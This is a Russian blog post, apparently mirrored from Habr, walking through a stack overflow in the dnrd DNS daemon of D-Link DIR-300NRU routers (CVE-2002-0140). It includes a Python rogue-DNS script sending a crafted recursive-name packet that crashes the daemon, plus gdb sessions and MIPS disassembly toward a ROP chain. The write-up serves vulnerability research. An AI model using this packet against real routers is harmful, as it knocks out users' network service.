{"id":202034,"date":"2013-11-14T09:32:02","date_gmt":"2013-11-14T05:32:02","guid":{"rendered":"http:\/\/savepearlharbor.com\/?p=202034"},"modified":"-0001-11-30T00:00:00","modified_gmt":"-0001-11-29T21:00:00","slug":"","status":"publish","type":"post","link":"https:\/\/savepearlharbor.com\/?p=202034","title":{"rendered":"\u042d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u043c \u0445\u043e\u0440\u043e\u0448\u043e \u0437\u0430\u0431\u044b\u0442\u0443\u044e \u0441\u0442\u0430\u0440\u0443\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 \u0440\u043e\u0443\u0442\u0435\u0440\u0430\u0445 D-Link DIR-300NRU<\/span>"},"content":{"rendered":"
\t\u042f \u0443\u0436\u0435 \u0440\u0430\u0441\u0441\u043a\u0430\u0437\u044b\u0432\u0430\u043b<\/a>, \u0447\u0442\u043e \u0432 \u0440\u043e\u0443\u0442\u0435\u0440\u0430\u0445 D-Link DIR-300NRU, \u0434\u043b\u044f \u0440\u0430\u0431\u043e\u0442\u044b DNS \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u0434\u0435\u043c\u043e\u043d dnrd \u043f\u043e\u0434\u0432\u0435\u0440\u0436\u0435\u043d\u043d\u044b\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 CVE-2002-0140. \u041f\u043e\u0434 \u043a\u0430\u0442\u043e\u043c \u044f \u043f\u043e\u043f\u0440\u043e\u0431\u0443\u044e \u0441\u0444\u043e\u0440\u043c\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u043f\u0430\u043a\u0435\u0442 \u0432\u044b\u0437\u044b\u0432\u0430\u044e\u0449\u0438\u0439 \u043f\u0435\u0440\u0435\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u0441\u0442\u0435\u043a\u0430 \u0438 \u0432\u043e\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0432\u0448\u0438\u0441\u044c \u043c\u0430\u0433\u0438\u0435\u0439 ROP<\/a>, \u0434\u043e\u0431\u0438\u0442\u044c\u0441\u044f \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u0438\u0445 \u0438\u043d\u0441\u0442\u0440\u0443\u043a\u0446\u0438\u0439 \u043d\u0430 \u0441\u0442\u0435\u043a\u0435.
<\/a><\/p>\n

\u0412\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u044f \u043f\u043e\u043f\u044b\u0442\u0430\u044e\u0441\u044c \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0439 \u043a\u043e\u0434: <\/p>\n

\tlui\tt9,0x2ab4 \taddiu\tt9,t9,-18464 \tnop \tjalr\tt9 \tnop <\/code><\/pre>\n
  \u0447\u0442\u043e \u0435\u0441\u0442\u044c \u043f\u0440\u043e\u0441\u0442\u043e \u0432\u044b\u0437\u043e\u0432 \u0444\u0443\u043d\u043a\u0446\u0438\u0438 exit(0)<\/i>. \u0421\u043e\u0433\u043b\u0430\u0441\u0435\u043d, \u043f\u0440\u043e\u0441\u0442\u043e \u0438 \u0431\u0435\u0437 \u0432\u043a\u0443\u0441\u0430. \u041d\u043e \u0432 \u0434\u0430\u043d\u043d\u044b\u0439 \u043c\u043e\u043c\u0435\u043d\u0442 \u044f \u0445\u043e\u0447\u0443 \u043f\u043e\u043a\u0430\u0437\u0430\u0442\u044c \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u0434\u0430 \u043d\u0430 \u0441\u0442\u0435\u043a\u0435. <\/p>\n
\u041d\u0435\u043c\u043d\u043e\u0433\u043e \u043e\u0431 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u0430\u0445.<\/h3>\n
  \u0414\u043b\u044f \u043a\u043e\u043c\u0444\u043e\u0440\u0442\u043d\u043e\u0433\u043e \u0438\u0437\u0443\u0447\u0435\u043d\u0438\u044f dnrd<\/i>, \u043d\u0430\u043c \u043f\u043e\u043d\u0430\u0434\u043e\u0431\u0438\u0442\u0441\u044f gdbserver<\/i> \u0432\u043d\u0435\u0434\u0440\u0435\u043d\u043d\u044b\u0439 \u0432 \u043f\u0440\u043e\u0448\u0438\u0432\u043a\u0443 \u0440\u043e\u0443\u0442\u0435\u0440\u0430 \u0438 \u0441\u0430\u043c gdb<\/i>, \u0441\u043e\u0431\u0440\u0430\u043d\u043d\u044b\u0439 \u0441 \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u043a\u043e\u0439 \u0430\u0440\u0445\u0438\u0442\u0435\u043a\u0442\u0443\u0440\u044b MIPS. \u0415\u0433\u043e \u043c\u043e\u0436\u043d\u043e \u0441\u043e\u0431\u0440\u0430\u0442\u044c \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u043d\u0430\u0431\u043e\u0440\u0430 \u0434\u043b\u044f \u043a\u0440\u043e\u0441\u0441-\u043a\u043e\u043c\u043f\u0438\u043b\u044f\u0446\u0438\u0438, \u043f\u0440\u0438\u043b\u0430\u0433\u0430\u044e\u0449\u0435\u0433\u043e\u0441\u044f \u043a \u0438\u0441\u0445\u043e\u0434\u043d\u0438\u043a\u0430\u043c \u043f\u0440\u043e\u0448\u0438\u0432\u043a\u0438<\/a>. \u0422\u0430\u043c \u0436\u0435 \u043d\u0430\u0439\u0434\u0435\u0442\u0441\u044f mipsel-linux-uclibc-objdump<\/i>, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043f\u043e\u0437\u0432\u043e\u043b\u0438\u0442 \u0434\u0438\u0437\u0430\u0441\u0441\u0435\u043c\u0431\u043b\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0431\u0438\u043d\u0430\u0440\u043d\u0438\u043a dnrd \u0438 \u0434\u0438\u043d\u0430\u043c\u0438\u0447\u0435\u0441\u043a\u0443\u044e \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0443 libc<\/i>, \u0438\u043c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u0443\u044e. \u0414\u043b\u044f \u0432\u043d\u0435\u0434\u0440\u0435\u043d\u0438\u044f \u0441\u0435\u0440\u0432\u0435\u0440\u043d\u043e\u0439 \u0447\u0430\u0441\u0442\u0438 \u043e\u0442\u043b\u0430\u0434\u0447\u0438\u043a\u0430 \u0432 \u043f\u0440\u043e\u0448\u0438\u0432\u043a\u0443, \u044f \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0441\u044f firmwire-mod-kit<\/a>. \u0427\u0442\u043e\u0431\u044b \u043f\u0440\u043e\u0448\u0438\u0432\u043a\u0430 \u0441\u043e\u0431\u0440\u0430\u043b\u0430\u0441\u044c \u043f\u0440\u0438\u0434\u0435\u0442\u0441\u044f \u0443\u0434\u0430\u043b\u0438\u0442\u044c \u0438\u0437 \u0444\u0430\u0439\u043b\u043e\u0432\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u044b \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u043d\u0435\u043d\u0443\u0436\u043d\u044b\u0445 \u0443\u0442\u0438\u043b\u0438\u0442.  <\/p>\n
\u0418 \u043d\u0430\u043a\u043e\u043d\u0435\u0446, \u043f\u0440\u043e\u0441\u0442\u0435\u043d\u044c\u043a\u0438\u0439 \u0441\u043a\u0440\u0438\u043f\u0442, \u0441\u043b\u0443\u0448\u0430\u044e\u0449\u0438\u0439 53 \u043f\u043e\u0440\u0442 UDP \u0438 \u043d\u0430 \u043b\u044e\u0431\u043e\u0439 \u0437\u0430\u043f\u0440\u043e\u0441 \u043e\u0442\u0441\u044b\u043b\u0430\u044e\u0449\u0438\u0439 \u043e\u0441\u043e\u0431\u044b\u043c \u043e\u0431\u0440\u0430\u0437\u043e\u043c \u0441\u0444\u043e\u0440\u043c\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0439 \u043f\u0430\u043a\u0435\u0442<\/b><\/p>\n
\n
#!\/usr\/bin\/python   import sys import socket  UDP_IP = "192.168.0.100" UDP_PORT = 53  sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.bind((UDP_IP, UDP_PORT))  k_answer = bytearray() for i in range(0,514): \tk_answer.append(i%256) k_answer[0:12] = [0xff,0xff,0x01,0x20,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x01]#\u0437\u0430\u0433\u043e\u043b\u043e\u0432\u043e\u043a DNS-\u043e\u0442\u0432\u0435\u0442 k_answer[12] = 0x1d      #\u0434\u043b\u0438\u043d\u043d\u0430 \u044d\u043b\u0435\u043c\u0435\u043d\u0442\u0430 \u043f\u043e\u043b\u044f name k_answer[42:44] = [0xc0,0x0c]   #\u0437\u0430\u0446\u0438\u043a\u043b\u0438\u043c name while True: \tdata, (r_addr, r_port) = sock.recvfrom(1024) \tsock.sendto(k_answer, (r_addr, r_port)) <\/code><\/pre>\n
  <\/div>\n<\/div>\n
  <\/p>\n
\u041f\u0435\u0440\u0435\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u0441\u0442\u0435\u043a\u0430<\/h3>\n
  \u0421 \u043f\u0435\u0440\u0432\u043e\u0439 \u043a\u043e\u043d\u0441\u043e\u043b\u0438 \u043f\u043e\u0434\u043a\u043b\u044e\u0447\u0430\u0435\u043c\u0441\u044f \u0447\u0435\u0440\u0435\u0437 telnet<\/i> \u043a \u0440\u043e\u0443\u0442\u0435\u0440\u0443 \u0438 \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u043c \u043d\u0430 \u043d\u0435\u043c \u0441\u0435\u0440\u0432\u0435\u0440 \u043e\u0442\u043b\u0430\u0434\u0447\u0438\u043a\u0430:  <\/p>\n
gdbserver 192.168.0.1:6666 \/usr\/sbin\/dnrd -s 192.168.0.100 <\/code><\/pre>\n
  192.168.0.100 \u2014 \u0430\u0434\u0440\u0435\u0441 \u0432\u044b\u0448\u0435\u0441\u0442\u043e\u044f\u0449\u0435\u0433\u043e DNS \u0441\u0435\u0440\u0432\u0435\u0440\u0430. \u0412 \u043d\u0430\u0448\u0435\u043c \u0441\u043b\u0443\u0447\u0430\u0435 \u044d\u0442\u043e \u043c\u0430\u0448\u0438\u043d\u0430 \u043d\u0430 \u043a\u043e\u0442\u043e\u0440\u043e\u0439 \u0437\u0430\u043f\u0443\u0449\u0435\u043d \u043d\u0430\u0448 \u0441\u043a\u0440\u0438\u043f\u0442.<\/p>\n
  \u041d\u0430 \u0432\u0442\u043e\u0440\u043e\u0439 \u043a\u043e\u043d\u0441\u043e\u043b\u0438 \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u043c mipsel-linux-uclibc-gdb<\/i> \u0438 \u043d\u0430\u0447\u0438\u043d\u0430\u0435\u043c \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u0443\u044e \u043e\u0442\u043b\u0430\u0434\u043a\u0443:  <\/p>\n
(gdb) target remote 192.168.0.1:6666 (gdb) continue <\/code><\/pre>\n
  \u0421 \u0442\u0440\u0435\u0442\u044c\u0435\u0439 \u043a\u043e\u043d\u0441\u043e\u043b\u0438 \u043f\u043e\u0441\u044b\u043b\u0430\u0435\u043c \u0437\u0430\u043f\u0440\u043e\u0441 \u043d\u0430 \u0440\u0430\u0437\u0440\u0435\u0448\u0435\u043d\u0438\u0435 \u0434\u043e\u043c\u0435\u043d\u043d\u043e\u0433\u043e \u0438\u043c\u0435\u043d\u0438 \u043a \u0438\u0441\u0441\u043b\u0435\u0434\u0443\u0435\u043c\u043e\u043c\u0443 \u0434\u0435\u043c\u043e\u043d\u0443, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0437\u0430\u0441\u0442\u0430\u0432\u0438\u0442 \u0435\u0433\u043e \u043e\u0431\u0440\u0430\u0442\u0438\u0442\u0441\u044f \u043a \u043d\u0430\u0448\u0435\u043c\u0443 \u0441\u043a\u0440\u0438\u043f\u0442\u0443 \u0438 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0441\u0444\u043e\u0440\u043c\u0438\u0440\u043e\u0432\u0430\u043d\u044b\u0439 \u043d\u0430\u043c\u0438 \u043f\u0430\u043a\u0435\u0442:  <\/p>\n
dig @192.168.0.1 example.com <\/code><\/pre>\n
  \u0412\u043e \u0432\u0442\u043e\u0440\u043e\u0439 \u043a\u043e\u043d\u0441\u043e\u043b\u0438 \u0441 \u043e\u0442\u043b\u0430\u0434\u0447\u0438\u043a\u043e\u043c \u043d\u0430\u0431\u043b\u044e\u0434\u0430\u0435\u043c:  <\/p>\n
Program terminated with signal SIGSEGV, Segmentation fault. The program no longer exists. <\/code><\/pre>\n
  \u0423\u0436\u0435 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u043e, \u043d\u043e \u043c\u044b \u0434\u043e\u0431\u0438\u043b\u0438\u0441\u044c \u0442\u043e\u043b\u044c\u043a\u043e \u0442\u043e\u0433\u043e, \u0447\u0442\u043e \u0438\u0441\u0441\u043b\u0435\u0434\u0443\u0435\u043c\u044b\u0439 \u043f\u0440\u043e\u0446\u0435\u0441\u0441 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u044f \u0431\u0435\u0441\u043a\u043e\u043d\u0435\u0447\u043d\u0443\u044e \u0440\u0435\u043a\u0443\u0440\u0441\u0438\u044e \u0444\u0443\u043d\u043a\u0446\u0438\u0438 get_objectname()<\/i> \u0434\u043e\u0431\u0440\u0430\u043b\u0441\u044f \u0434\u043e \u0433\u0440\u0430\u043d\u0438\u0446\u044b \u0441\u0435\u0433\u043c\u0435\u043d\u0442\u0430 \u0441\u0442\u0435\u043a\u0430 \u0438 \u043f\u043e\u043f\u044b\u0442\u0430\u043b\u0441\u044f \u0437\u0430\u043f\u0438\u0441\u0430\u0442\u044c \u0434\u0430\u043d\u043d\u044b\u0435 \u0432 \u043d\u0435\u0434\u043e\u0441\u0442\u0443\u043f\u043d\u0443\u044e \u0435\u043c\u0443 \u043f\u0430\u043c\u044f\u0442\u044c. \u0417\u0430 \u044d\u0442\u043e \u043e\u043d \u0431\u044b\u043b \u043d\u0430\u043a\u0430\u0437\u0430\u043d \u0441\u0438\u0433\u043d\u0430\u043b\u043e\u043c \u211611 \u0438 \u043f\u0440\u0438\u043d\u0443\u0434\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u0437\u0430\u0432\u0435\u0440\u0448\u0435\u043d. \u041f\u043e\u043d\u044f\u0442\u043d\u043e, \u0447\u0442\u043e \u043f\u0435\u0440\u0435\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u0438\u043c\u0435\u0435\u0442 \u043c\u0435\u0441\u0442\u043e \u0431\u044b\u0442\u044c, \u043d\u043e \u043a\u0430\u043a \u044d\u0442\u0438\u043c \u0432\u043e\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c\u0441\u044f?<\/p>\n
\u0414\u0435\u043b\u0430\u0435\u043c \u0440\u0435\u043a\u0443\u0440\u0441\u0438\u044e \u043a\u043e\u043d\u0435\u0447\u043d\u043e\u0439<\/h3>\n
  \u0422\u0435\u043f\u0435\u0440\u044c \u043d\u0430\u043c \u043d\u0430\u0434\u043e \u043a\u0430\u043a-\u0442\u043e \u0434\u043e\u0431\u0440\u0430\u0442\u044c\u0441\u044f \u0434\u043e \u043d\u0430\u0448\u0435\u0439 \u0444\u0443\u043d\u043a\u0446\u0438\u0438 get_objectname()<\/i>. \u041f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u0432 \u0442\u043e\u043c, \u0447\u0442\u043e \u0432 \u0431\u0438\u043d\u0430\u0440\u043d\u0438\u043a\u0435 dnrd \u0442\u0430\u043a\u043e\u0433\u043e \u0441\u0438\u043c\u0432\u043e\u043b\u0430 \u043d\u0435\u0442. \u042f \u043f\u043e\u0448\u0435\u043b \u0441\u0430\u043c\u044b\u043c \u043f\u0440\u043e\u0441\u0442\u044b\u043c \u043f\u0443\u0442\u0435\u043c \u2014 \u0437\u0430\u0433\u043b\u044f\u043d\u0443\u043b \u0432 \u0438\u0441\u0445\u043e\u0434\u043d\u0438\u043a\u0438. \u041e\u043a\u0430\u0437\u0430\u043b\u043e\u0441\u044c, \u0447\u0442\u043e \u043d\u0430\u0448\u0430 \u043d\u0435 \u0441\u043e\u0432\u0441\u0435\u043c \u043a\u043e\u0440\u0440\u0435\u043a\u0442\u043d\u043e \u0440\u0430\u0431\u043e\u0442\u0430\u044e\u0449\u0430\u044f \u0444\u0443\u043d\u043a\u0446\u0438\u044f \u0432\u044b\u0437\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u0438\u0437 \u0444\u0443\u043d\u043a\u0446\u0438\u0438 parse_query()<\/i>.   <\/p>\n
\u041e\u0442\u0441\u044e\u0434\u0430 \u0438 \u043d\u0430\u0447\u043d\u0435\u043c<\/b><\/p>\n
\n
   0x405e00 <parse_query>:\tlui\tgp,0xfc0; \u043d\u0430 \u0442\u0440\u0435\u0442\u044c\u0435\u043c \u0432\u0445\u043e\u0434\u0435 \u043d\u0430\u0447\u0438\u043d\u0430\u0435\u0442\u0441\u044f \u0432\u0441\u0435 \u0441\u0430\u043c\u043e \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u043e\u0435    0x405e04 <parse_query+4>:\taddiu\tgp,gp,9648    0x405e08 <parse_query+8>:\taddu\tgp,gp,t9    0x405e0c <parse_query+12>:\taddiu\tsp,sp,-48    0x405e10 <parse_query+16>:\tsw\tgp,16(sp)    0x405e14 <parse_query+20>:\tmove\tt0,a1    0x405e18 <parse_query+24>:\tsw\ts1,36(sp)    0x405e1c <parse_query+28>:\tsw\ts0,32(sp)    0x405e20 <parse_query+32>:\tsw\tra,44(sp)    0x405e24 <parse_query+36>:\tsw\tgp,40(sp)    0x405e28 <parse_query+40>:\tlhu\tv1,4(t0)    0x405e2c <parse_query+44>:\taddiu\ts0,a0,2    0x405e30 <parse_query+48>:\tandi\tv0,v1,0xff    0x405e34 <parse_query+52>:\tsll\tv0,v0,0x8    0x405e38 <parse_query+56>:\tsrl\tv1,v1,0x8    0x405e3c <parse_query+60>:\tor\tv1,v1,v0    0x405e40 <parse_query+64>:\taddiu\tt1,a1,12    0x405e44 <parse_query+68>:\tmove\ts1,a0    0x405e48 <parse_query+72>:\tmove\ta3,zero    0x405e4c <parse_query+76>:\taddiu\ta1,sp,28    0x405e50 <parse_query+80>:\tmove\ta0,t0    0x405e54 <parse_query+84>:\tmove\ta2,s0    0x405e58 <parse_query+88>:\tbeqz\tv1,0x405f58 <parse_query+344>; \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u043e \u043d\u043e \u043d\u0435 \u0442\u043e... \u0438\u0434\u0435\u043c \u0434\u0430\u043b\u044c\u0448\u0435    0x405e5c <parse_query+92>:\tmove\tv0,zero    0x405e60 <parse_query+96>:\tlhu\tv1,2(t0)    0x405e64 <parse_query+100>:\tsw\tt1,28(sp)    0x405e68 <parse_query+104>:\tandi\tv0,v1,0xff    0x405e6c <parse_query+108>:\tsll\tv0,v0,0x8    0x405e70 <parse_query+112>:\tsrl\tv1,v1,0x8    0x405e74 <parse_query+116>:\tor\tv1,v1,v0    0x405e78 <parse_query+120>:\tsh\tv1,0(s1)    0x405e7c <parse_query+124>:\tlw\tt9,-32740(gp)    0x405e80 <parse_query+128>:\tnop    0x405e84 <parse_query+132>:\taddiu\tt9,t9,21180    0x405e88 <parse_query+136>:\tnop    0x405e8c <parse_query+140>:\tjalr\tt9;\u0432\u043e\u0442 \u0442\u0443\u0442 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u043e - \u0434\u043e \u0432\u0445\u043e\u0434\u0430 \u0441\u0442\u0435\u043a \u0435\u0441\u0442\u044c,     0x405e90 <parse_query+144>:\tnop    ;\u0430 \u043f\u043e\u0441\u043b\u0435 - \u043d\u0435\u0442\u0443 0x4052bc - \u0430\u0434\u0440\u0435\u0441 \u043a\u0443\u0434\u0430 \u0443\u0445\u043e\u0434\u0438\u043c    0x405e94 <parse_query+148>:\tlw\tgp,16(sp)    0x405e98 <parse_query+152>:\taddu\tv0,s1,v0    0x405e9c <parse_query+156>:\tlw\ta0,28(sp)    0x405ea0 <parse_query+160>:\tsb\tzero,2(v0)    0x405ea4 <parse_query+164>:\tlb\tv0,0(a0)    0x405ea8 <parse_query+168>:\tlb\tv1,1(a0)    0x405eac <parse_query+172>:\tsb\tv0,24(sp)    0x405eb0 <parse_query+176>:\tsb\tv1,25(sp)    0x405eb4 <parse_query+180>:\tlhu\tv1,24(sp)    0x405eb8 <parse_query+184>:\taddiu\ta1,a0,2    0x405ebc <parse_query+188>:\tandi\tv0,v1,0xff    0x405ec0 <parse_query+192>:\tsll\tv0,v0,0x8    0x405ec4 <parse_query+196>:\tsrl\tv1,v1,0x8    0x405ec8 <parse_query+200>:\tor\tv1,v1,v0    0x405ecc <parse_query+204>:\tsw\ta1,28(sp)    0x405ed0 <parse_query+208>:\tsw\tv1,304(s1)    0x405ed4 <parse_query+212>:\tlb\tv0,2(a0)    0x405ed8 <parse_query+216>:\tlb\tv1,3(a0)    0x405edc <parse_query+220>:\tsb\tv0,24(sp)    0x405ee0 <parse_query+224>:\tsb\tv1,25(sp)    0x405ee4 <parse_query+228>:\tlhu\tv1,24(sp)    0x405ee8 <parse_query+232>:\taddiu\ta0,a0,4    0x405eec <parse_query+236>:\tandi\tv0,v1,0xff    0x405ef0 <parse_query+240>:\tsll\tv0,v0,0x8    0x405ef4 <parse_query+244>:\tsrl\tv1,v1,0x8    0x405ef8 <parse_query+248>:\tor\tv1,v1,v0    0x405efc <parse_query+252>:\tsw\tv1,308(s1)    0x405f00 <parse_query+256>:\tsw\ta0,28(sp)    0x405f04 <parse_query+260>:\tmove\ta0,s0    0x405f08 <parse_query+264>:\tlw\tt9,-32664(gp)    0x405f0c <parse_query+268>:\tnop    0x405f10 <parse_query+272>:\tjalr\tt9    0x405f14 <parse_query+276>:\tnop    0x405f18 <parse_query+280>:\tlw\tgp,16(sp)    0x405f1c <parse_query+284>:\taddu\tv1,v0,s1    0x405f20 <parse_query+288>:\taddiu\ta1,v1,-1    0x405f24 <parse_query+292>:\tblez\tv0,0x405f40 <parse_query+320>    0x405f28 <parse_query+296>:\tmove\ta0,s0    0x405f2c <parse_query+300>:\tlb\tv1,2(a1)    0x405f30 <parse_query+304>:\tli\tv0,46    0x405f34 <parse_query+308>:\tbne\tv1,v0,0x405f40 <parse_query+320>    0x405f38 <parse_query+312>:\tnop    0x405f3c <parse_query+316>:\tsb\tzero,2(a1)    0x405f40 <parse_query+320>:\tlw\tt9,-32180(gp)    0x405f44 <parse_query+324>:\tnop    0x405f48 <parse_query+328>:\tjalr\tt9    0x405f4c <parse_query+332>:\tnop    0x405f50 <parse_query+336>:\tlw\tgp,16(sp)    0x405f54 <parse_query+340>:\tlw\tv0,28(sp)    0x405f58 <parse_query+344>:\tlw\tra,44(sp)    0x405f5c <parse_query+348>:\tlw\ts1,36(sp)    0x405f60 <parse_query+352>:\tlw\ts0,32(sp)    0x405f64 <parse_query+356>:\tjr\tra    0x405f68 <parse_query+360>:\taddiu\tsp,sp,48    0x405f6c <parse_query+364>:\tnop  <\/code><\/pre>\n
  <\/div>\n<\/div>\n
  \u041f\u043e\u0441\u0442\u0430\u0432\u0438\u0432 \u0442\u043e\u0447\u043a\u0438 \u043f\u0440\u0435\u0440\u044b\u0432\u0430\u043d\u0438\u044f \u043d\u0430 \u0430\u0434\u0440\u0435\u0441\u0430 0x405e8c \u0438 0x405e94. \u041d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0440\u0430\u0437 \u0432\u0441\u0435 \u043f\u0440\u043e\u0445\u043e\u0434\u0438\u0442 \u0443\u0434\u0430\u0447\u043d\u043e. \u0421\u0442\u0435\u043a \u0438 \u0440\u0435\u0433\u0438\u0441\u0442\u0440\u044b \u043f\u0435\u0440\u0435\u0434 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u043c \u0432\u0445\u043e\u0434\u043e\u043c \u0432 \u0444\u0443\u043d\u043a\u0446\u0438\u044e:  <\/p>\n
(gdb) i r           zero       at       v0       v1       a0       a1       a2       a3  R0   00000000 1100fc00 00000100 00000120 7f925960 7f925694 7f9256c2 00000000              t0       t1       t2       t3       t4       t5       t6       t7  R8   7f925960 7f92596c 2aaae13c 2aaf48c4 00000410 073c3a40 2aaf5ed4 00401538              s0       s1       s2       s3       s4       s5       s6       s7  R16  7f9256c2 7f9256c0 00000000 7f925c00 7f925c08 1000b678 10007124 00000000              t8       t9       k0       k1       gp       sp       s8       ra  R24  2aaf07c4 004052bc 00000000 00000000 100083b0 7f925678 7f8d5ac8 004033d0              sr       lo       hi      bad    cause       pc       00000000 0001cbe9 000002e1 00407038 10800024 00405e8c             fsr      fir       00000000 00000000  (gdb) bt #0  0x00405e8c in parse_query () #1  0x004033d0 in cache_dnspacket () #2  0x00408228 in handle_udpreply () #3  0x0040752c in run () #4  0x00402778 in main () (gdb) c <\/code><\/pre>\n
  \u041f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u0435\u043c \u0438\u2026 \u043d\u0430\u0448\u0430 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u0430 \u0441\u043d\u043e\u0432\u0430 \u0443\u043c\u0438\u0440\u0430\u0435\u0442. \u0412\u043e\u0442 \u0438 \u043d\u0430\u0448\u043b\u0430\u0441\u044c \u043d\u0430\u0448\u0430 \u0444\u0443\u043d\u043a\u0446\u0438\u044f get_objectname()<\/i>. \u041e\u043d\u0430 \u0436\u0438\u0432\u0435\u0442 \u043f\u043e \u0430\u0434\u0440\u0435\u0441\u0443 \u0432 \u0440\u0435\u0433\u0438\u0441\u0442\u0440\u0435 t9 = 0x004052bc. 
  \u0421\u0442\u043e\u0438\u0442 \u0443\u043f\u043e\u043c\u044f\u043d\u0443\u0442\u044c, \u0447\u0442\u043e \u0434\u043b\u044f MIPS \u043f\u0440\u0438\u043d\u044f\u0442\u043e \u0437\u043d\u0430\u0447\u0435\u043d\u0438\u044f \u043f\u0435\u0440\u0435\u0434\u0430\u0432\u0430\u0435\u043c\u044b\u0435 \u0444\u0443\u043d\u043a\u0446\u0438\u0438 \u0441\u043e\u0445\u0440\u0430\u043d\u044f\u0442\u044c \u0432 \u0440\u0435\u0433\u0438\u0441\u0442\u0440\u0430\u0445 a0-a3, \u0432\u043e\u0437\u0432\u0440\u0430\u0449\u0430\u0435\u043c\u044b\u0435 \u0437\u043d\u0430\u0447\u0435\u043d\u0438\u044f \u0441\u043e\u0445\u0440\u0430\u043d\u044f\u044e\u0442\u0441\u044f \u0432 \u0440\u0435\u0433\u0438\u0441\u0442\u0440\u0430\u0445 v0 \u0438 v1, \u0430 \u0430\u0434\u0440\u0435\u0441\u0441 \u0432\u043e\u0437\u0432\u0440\u0430\u0442\u0430 \u2014 \u0432 \u0440\u0435\u0433\u0438\u0441\u0442\u0440\u0435 ra. \u0415\u0441\u043b\u0438 \u0444\u0443\u043d\u043a\u0446\u0438\u0438 \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e \u0431\u0443\u0434\u0435\u0442 \u0432\u044b\u0437\u044b\u0432\u0430\u0442\u044c \u0434\u0440\u0443\u0433\u0438\u0435 \u0444\u0443\u043d\u043a\u0446\u0438\u0438, \u0442\u043e \u0440\u0435\u0433\u0438\u0441\u0442\u0440 ra \u0441\u043e\u0445\u0440\u0430\u043d\u044f\u0435\u0442\u0441\u044f \u043d\u0430 \u0441\u0442\u0435\u043a\u0435. \u042d\u0442\u0438\u043c \u043c\u044b \u0441\u043a\u043e\u0440\u043e \u0438 \u0432\u043e\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u0441\u044f.<\/p>\n
  \u0421\u0432\u0435\u0440\u0438\u0432\u0448\u0438\u0441\u044c \u0441 \u0438\u0441\u0445\u043e\u0434\u043d\u0438\u043a\u0430\u043c\u0438, \u0443\u0432\u0438\u0434\u0438\u043c, \u0447\u0442\u043e \u0432 a0 \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u0442\u0441\u044f \u0430\u0434\u0440\u0435\u0441 \u043d\u0430\u0448\u0435\u0433\u043e \u043f\u0430\u043a\u0435\u0442\u0430 (msg<\/i>), \u0430 \u0432 a2 \u0430\u0434\u0440\u0435\u0441 \u0431\u0443\u0444\u0435\u0440\u0430 \u0432 \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0441\u043e\u0445\u0440\u0430\u043d\u044f\u0435\u0442\u0441\u044f \u043f\u043e\u043b\u0435 NAME DNS-\u043e\u0442\u0432\u0435\u0442\u0430 (y->name);
